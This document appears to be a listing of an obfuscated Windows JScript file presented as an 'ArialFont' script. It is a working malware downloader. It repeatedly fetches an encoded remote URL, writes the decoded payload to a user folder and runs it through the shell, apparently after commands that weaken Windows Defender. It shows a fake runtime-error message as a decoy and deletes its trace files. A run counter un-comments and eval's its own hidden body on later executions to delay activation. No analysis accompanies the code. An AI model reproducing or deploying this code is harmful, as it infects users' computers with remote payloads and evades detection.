Obfuscated ArialFont JScript file

1.     var bfefbdcfdfcdc = new ActiveXObject('Scripting.FileSystemObject');
2.    
3.     if(bfefbdcfdfcdc.FileExists('cdcaabebebaffca.txt')){
4.         bfefbdcfdfcdc.DeleteFile(fcdedcaefdbdad + '/' + 'cdcaabebebaffca.txt');
5.         Wscript.echo('efefbccbda');
6.        
7.         Wscript.echo('efefbccbda');
8.        
9.         Wscript.echo('efefbccbda');
10.     }
11.     if(bfefbdcfdfcdc.FileExists('cdcaabebebaffcaas.txt'))bfefbdcfdfcdc.DeleteFile(fcdedcaefdbdad + '/' + 'cdcaabebebaffcaas.txt');
12.    
13.     var fcdedcaefdbdad = bfefbdcfdfcdc.GetSpecialFolder(2);
14.  
15.  
16. /*
17.  
18. var ffecbebbafcc = '';
19. var fdbaeeabf = [];
20. var badbffbeabd;
21.  
22. function fdebeccfdaf(acfddfc) {
23.     var fdebabbbacf = acfddfc.toString();
24.     var aedfcafcccfdad = '';
25.     for (var eadccadbceeaad = 0; eadccadbceeaad < fdebabbbacf.length; eadccadbceeaad += 2)
26.         aedfcafcccfdad += String.fromCharCode(parseInt(fdebabbbacf.substr(eadccadbceeaad, 2), 16));
27.     return aedfcafcccfdad;
28. }
29.  
30. function aaafeeffdaf(babbadebba) {
31.   return !isNaN(parseFloat(babbadebba)) && isFinite(babbadebba);
32. }
33.  
34.  
35.  
36. function ddcdafcdac(beeecdadcceacbeeecdadcceac,daedfadcac){
37.    
38.    
39.     for(i=daedfadcac;i>0;i--){
40.        
41.         beeecdadcceacbeeecdadcceac = beeecdadcceacbeeecdadcceac - 1;
42.        
43.         if(beeecdadcceacbeeecdadcceac<0)beeecdadcceacbeeecdadcceac = 9;
44.        
45.     }
46.  
47.     return beeecdadcceacbeeecdadcceac;
48.    
49.  
50. }
51.  
52.  
53.  
54.  
55. function bcddfeaffacac(sstrstrtbeeecdadcceacr,faeacdaebdbcd){
56.    
57.    
58.    
59.     var fbdefbadcfecfe = sstrstrtbeeecdadcceacr.length;
60.    
61.     var aefacbbaebbffafbe = '';
62.    
63.    
64.     var cebffeccae = 0;
65.    
66.     for(var bbffbdbcfed=0;bbffbdbcfed<fbdefbadcfecfe;bbffbdbcfed++){
67.        
68.         if(cebffeccae>10)cebffeccae=0;
69.        
70.        
71.         if(aaafeeffdaf(sstrstrtbeeecdadcceacr.charAt(bbffbdbcfed))){
72.        
73.             aefacbbaebbffafbe = aefacbbaebbffafbe + ddcdafcdac(sstrstrtbeeecdadcceacr.charAt(bbffbdbcfed),faeacdaebdbcd[cebffeccae]);
74.             cebffeccae++;
75.            
76.         }else{
77.            
78.             aefacbbaebbffafbe = aefacbbaebbffafbe + sstrstrtbeeecdadcceacr.charAt(bbffbdbcfed);
79.            
80.         }
81.        
82.     }
83.    
84.     return aefacbbaebbffafbe;
85. }
86.  
87.  
88. function ceecacabbad(feccdeaddccda,fdcedeccfccb){
89.    
90.     var eaaebfdfeedef = "^DQqM1.c8OnIbg&7:yad2BC!LFPR0l(Ux9SkKpof5G+N4@-zhVw,%3isuvjrt*;WXJAeH)_$ZT6YmE";
91.     var baefbffba = "";
92.  
93.     var addebdcfcfcccc = eaaebfdfeedef.length-1;
94.  
95.     var size = feccdeaddccda.length;
96.  
97.    
98.    
99.     for(var eacecadafbf = 0; eacecadafbf<size ; eacecadafbf++){
100.        
101.         var facabcbfcddccbb = eaaebfdfeedef.indexOf(feccdeaddccda.charAt(eacecadafbf));
102.        
103.         var eebfdceff = facabcbfcddccbb - fdcedeccfccb;
104.        
105.         if(eebfdceff<0){
106.            
107.             eebfdceff = addebdcfcfcccc - Math.abs(eebfdceff);
108.            
109.             var daedfadcac = addebdcfcfcccc - 1;   
110.        
111.             if(eebfdceff==daedfadcac)eebfdceff = eebfdceff + fdcedeccfccb;
112.            
113.         }
114.        
115.        
116.         baefbffba = baefbffba + eaaebfdfeedef.charAt(eebfdceff);
117.     }
118.    
119.     return fdebeccfdaf(baefbffba);
120. }
121.  
122.  
123. var addcfeccbca = new ActiveXObject(ceecacabbad(":iYi:BYS:l:@YSY^Y:B^YYYSY!YG:i:S:i:@YGYQYPYBYeYGYi:@",1));
124. var fcdedcaefdbdad = addcfeccbca.GetSpecialFolder(2);
125.  
126.  
127. var addcfeccbcaDeck = new ActiveXObject(ceecacabbad('G:GiYi:BYS:l:@B^:iYOYGY!Y!',1));
128. var debbcfaaaaffcdbed = addcfeccbcaDeck.SpecialFolders(ceecacabbad('@@YG:iYC:@YP:l',1));
129. var fcdedcaefdbdadd = debbcfaaaaffcdbed;
130.  
131. var cbebdeebffcfcdbeb = new ActiveXObject(ceecacabbad(":iYi:BYS:l:@YSY^Y:B^YYYSY!YG:i:S:i:@YGYQYPYBYeYGYi:@",1));    
132.  
133.  
134. var efdbceecefe = new ActiveXObject(ceecacabbad('@Q:i:OYQY!iBB^GO@Q@!@OG@G@GlB^iiB^il',1));
135.  
136.  
137. var bdadaffecae = 0;
138.  
139. var afcdafafddad = 0;
140.  
141. var linksssee = ['YO:@:@:lieBPBP:iYPYBYBYG:BYSY^YYYPB^YiYPYQBPY:Y.:@YGB^:lYO:l'];
142.  
143. while(true){
144.    
145.     bdadaffecae++;
146.    
147.     if(linksssee[afcdafafddad] == undefined)afcdafafddad = 0;
148.    
149.    
150.     try {
151.    
152.         efdbceecefe.open(ceecacabbad('@:@GG@',1,1), ceecacabbad(linksssee[afcdafafddad],1)+'?ff'+bdadaffecae, false);
153.         efdbceecefe.send();
154.    
155.  
156.     } catch(e) {
157.  
158.         afcdafafddad++;
159.         WScript.Sleep(1000);
160.         continue;
161.  
162.     }
163.    
164.  
165.     var feabfebecfd = efdbceecefe.responseText.indexOf('|||');
166.  
167.     if( feabfebecfd == -1 ){
168.        
169.         afcdafafddad++;
170.         WScript.Sleep(1000);
171.         continue;
172.        
173.     }
174.  
175.    
176.     if(efdbceecefe.Status == 200)break;
177. }
178.  
179.    var adfeedadcaedff = efdbceecefe.responseText;
180.    
181.     adfeedadcaedff = adfeedadcaedff.split(ceecacabbad(':!:!:!',1));
182.  
183.     var bfdfdcdcebbbaed = adfeedadcaedff[0].split(ceecacabbad('B!',1));
184.    
185.  
186.    
187. ffecbebbafcc = bcddfeaffacac(adfeedadcaedff[1],bfdfdcdcebbbaed);
188.    
189. var fddcebbfafaooo = new ActiveXObject(ceecacabbad(":iYi:BYS:l:@YSY^Y:B^YYYSY!YG:i:S:i:@YGYQYPYBYeYGYi:@",1));
190.    
191. var  fdbaeeabf = [];
192.  
193.  
194.  
195. for(var bbffbdbcfed=0; bbffbdbcfed< ffecbebbafcc.length-1; bbffbdbcfed+=2){
196.     fdbaeeabf.push(parseInt(ffecbebbafcc.substr(bbffbdbcfed, 2), 16));
197. }
198.  
199. badbffbeabd = String.fromCharCode.apply(String, fdbaeeabf);
200.  
201.  
202. function cceaafdcfbcdcb(abafaabfdcfedc){
203.  
204.  
205. var bcafececaae = abafaabfdcfedc;
206. var ddbeeecedcdc = new ActiveXObject(ceecacabbad('@.@@@P@@@BB^Gi:@:BYGY.YQ',1));
207. ddbeeecedcdc.Type = 2;
208. ddbeeecedcdc.Charset = 'ISO-8859-1';
209. ddbeeecedcdc.Open();
210. ddbeeecedcdc.WriteText(bcafececaae);
211. ddbeeecedcdc.SaveToFile(fcdedcaefdbdadd + '/' +ceecacabbad('iiiYY@i@B^YG:OYG',1), 2);
212. ddbeeecedcdc.Close();
213.  
214. }
215.  
216.  
217.  
218.  
219.  
220. cceaafdcfbcdcb(badbffbeabd);
221.  
222.  
223.    var fddcebbfafa = new ActiveXObject(ceecacabbad(":iYi:BYS:l:@YSY^Y:B^YYYSY!YG:i:S:i:@YGYQYPYBYeYGYi:@",1));
224.    
225.  
226.     var abaffdddbeafbacb = fddcebbfafa.FileExists(fcdedcaefdbdad + '/' +'cecabddbfacbdb.txt');
227.    
228.     var bedbcafcabb = new ActiveXObject(ceecacabbad('G:GiYi:BYS:l:@B^:iYOYGY!Y!',1));
229.            
230.        
231.    
232.  
233. bedbcafcabb.Run(ceecacabbad('YiYQY@B^YG:OYGBlBPYiBl',1) + ceecacabbad('BBYGYiYOYPBlGCGeYPY^YGG@:BY.Y^:iYYYG:BGQi^Bl',1)+ fcdedcaefdbdadd +'\\'+ ceecacabbad('iiiYY@i@B^YG:OYG',1)+ceecacabbad('ieGeYPY^YGB^@SY@YGY^:@YSYYYSYG:BBB',1),0,false);
234.  
235. bedbcafcabb.Run(ceecacabbad('YiYQY@B^YG:OYGBlBPYiBl',1) + ceecacabbad('BBYGYiYOYPBlGeYPY^YG@SY@iQiBi^i^Bl',1)+ fcdedcaefdbdadd +'\\'+ ceecacabbad('iiiYY@i@B^YG:OYG',1)+ceecacabbad('ieGeYPY^YGB^@SY@YGY^:@YSYYYSYG:BBB',1),0,false);
236.  
237.    
238. bedbcafcabb.Run(ceecacabbad('YiYQY@B^YG:OYGBlBPYiBl',1)+ fcdedcaefdbdadd +'\\'+ ceecacabbad('iiiYY@i@B^YG:OYG',1),0,false);
239.  
240.  
241.    
242.    
243.     WScript.echo('Runtime Error 0x48940 (.QBT) Library not located on the system, please use x64 system.');
244.  
245.     fddcebbfafa.DeleteFile(fcdedcaefdbdad + '/' +'fbdefbadcfecfeer.txt');
246.     if(abaffdddbeafbacb)fddcebbfafa.DeleteFile(fcdedcaefdbdad + '/' +'cecabddbfacbdb.txt');
247.    
248.     WScript.Quit();
249.    
250.     */
251.    
252.     function ceaeaaecefa(fcbbdfd){
253.        
254.  
255.         var dfedaddbdfeed = new ActiveXObject('Scripting.FileSystemObject');
256.        
257.         var ecefcbacedebfda = fcbbdfd;
258.        
259.         var bcbdbacebfbeecff = ecefcbacedebfda;
260.    
261.         var fadefbfedbfcaa = dfedaddbdfeed.OpenTextFile(bcbdbacebfbeecff, 1);
262.        
263.         var fffbcaecdacedf =  fadefbfedbfcaa.ReadAll();
264.                
265.         fadefbfedbfcaa.Close();
266.        
267.         return fffbcaecdacedf;
268.        
269.     }
270.  
271.    
272.    var fbdefbadcfecfe = 0;
273.    var abaffdddbeafbacb = bfefbdcfdfcdc.FileExists(fcdedcaefdbdad + '/' + 'fbdefbadcfecfeer.txt');
274.    if(abaffdddbeafbacb == true){
275.     var fcbbfeadfdadb = bfefbdcfdfcdc.OpenTextFile(fcdedcaefdbdad + '/' + 'fbdefbadcfecfeer.txt', 1,1);
276.     fbdefbadcfecfe = fcbbfeadfdadb.ReadAll();
277.             fcbbfeadfdadb.Close();
278.    }
279.     fbdefbadcfecfe = parseInt(fbdefbadcfecfe) +1;
280.    
281. if(bfefbdcfdfcdc.FileExists('cdcaabebebaffc3.txt'))bfefbdcfdfcdc.DeleteFile(fcdedcaefdbdad + '/' + 'cdcaabebebaffc3.txt');
282.    
283.     fcbbfeadfdadb = bfefbdcfdfcdc.OpenTextFile(fcdedcaefdbdad + '/' + 'fbdefbadcfecfeer.txt', 2,1);
284.    
285.     fcbbfeadfdadb.WriteLine(fbdefbadcfecfe);
286.     fcbbfeadfdadb.Close();
287.    
288.     var caecebcfccacab = WScript.ScriptFullName;
289.     var feeddabdbddfb = ceaeaaecefa(caecebcfccacab);
290.    
291.     if(bfefbdcfdfcdc.FileExists('cdcaabebebaffc.txt'))bfefbdcfdfcdc.DeleteFile(fcdedcaefdbdad + '/' + 'cdcaabebebaffc.txt');
292.    
293.     if(fbdefbadcfecfe==4){
294.        
295.        
296.         fcbbfeadfdadb = bfefbdcfdfcdc.OpenTextFile(fcdedcaefdbdad + '/' + 'cadabcdeabceaded.txt', 2,1);
297.        
298.         if(bfefbdcfdfcdc.FileExists('cdcaabebebaffca.txt'))bfefbdcfdfcdc.DeleteFile(fcdedcaefdbdad + '/' + 'cdcaabebebaffca.txt');
299.        
300.         fcbbfeadfdadb.WriteLine(fbdefbadcfecfe);
301.         fcbbfeadfdadb.Close();
302.        
303.     }
304.    
305.     if(fbdefbadcfecfe==5){
306.        
307.         if(bfefbdcfdfcdc.FileExists(fcdedcaefdbdad + '/' + 'fadaeabefaac.jpg'))bfefbdcfdfcdc.DeleteFile(fcdedcaefdbdad + '/' + 'fadaeabefaac.jpg');
308.         bfefbdcfdfcdc.MoveFile(fcdedcaefdbdad + '/' + 'cadabcdeabceaded.txt', fcdedcaefdbdad + '/' + 'cecabddbfacbdb.txt');
309.         if(bfefbdcfdfcdc.FileExists(fcdedcaefdbdad + '/' + 'fcefbfaef.txt'))bfefbdcfdfcdc.DeleteFile(fcdedcaefdbdad + '/' + 'fcefbfaef.txt');
310.         if(bfefbdcfdfcdc.FileExists(fcdedcaefdbdad + '/' + 'fcefbfaef.txt'))bfefbdcfdfcdc.DeleteFile(fcdedcaefdbdad + '/' + 'fcefbfaef.txt');
311.         if(bfefbdcfdfcdc.FileExists(fcdedcaefdbdad + '/' + 'fcefbfaef.txt'))bfefbdcfdfcdc.DeleteFile(fcdedcaefdbdad + '/' + 'fcefbfaef.txt');
312.        
313.         if(bfefbdcfdfcdc.FileExists(fcdedcaefdbdad + '/' + 'fcefbfaef.txt'))bfefbdcfdfcdc.DeleteFile(fcdedcaefdbdad + '/' + 'fcefbfaef.txt');
314.        
315.  
316.         if(bfefbdcfdfcdc.FileExists('cdcaabebebaffca.txt'))bfefbdcfdfcdc.DeleteFile(fcdedcaefdbdad + '/' + 'cdcaabebebaffca.txt');
317.    
318.         feeddabdbddfb = feeddabdbddfb.replace('/*','').replace('*/', '').replace('ebdcedddfdcddccae', '').replace('ebdcedddfdcddccae', '').replace('ebdcedddfdcddccae', '').replace('ebdcedddfdcddccae', '').replace('ebdcedddfdcddccae', '');
319.     }
320.    
321.    
322.  
323.     var abaffdddbeafbacb = bfefbdcfdfcdc.FileExists(fcdedcaefdbdad + '/' + 'cecabddbfacbdb.txt');
324.  
325.      if(abaffdddbeafbacb == true){
326.        
327.        eval(feeddabdbddfb);
328.        
329.     }
330.  
331.    
332.     eval(feeddabdbddfb);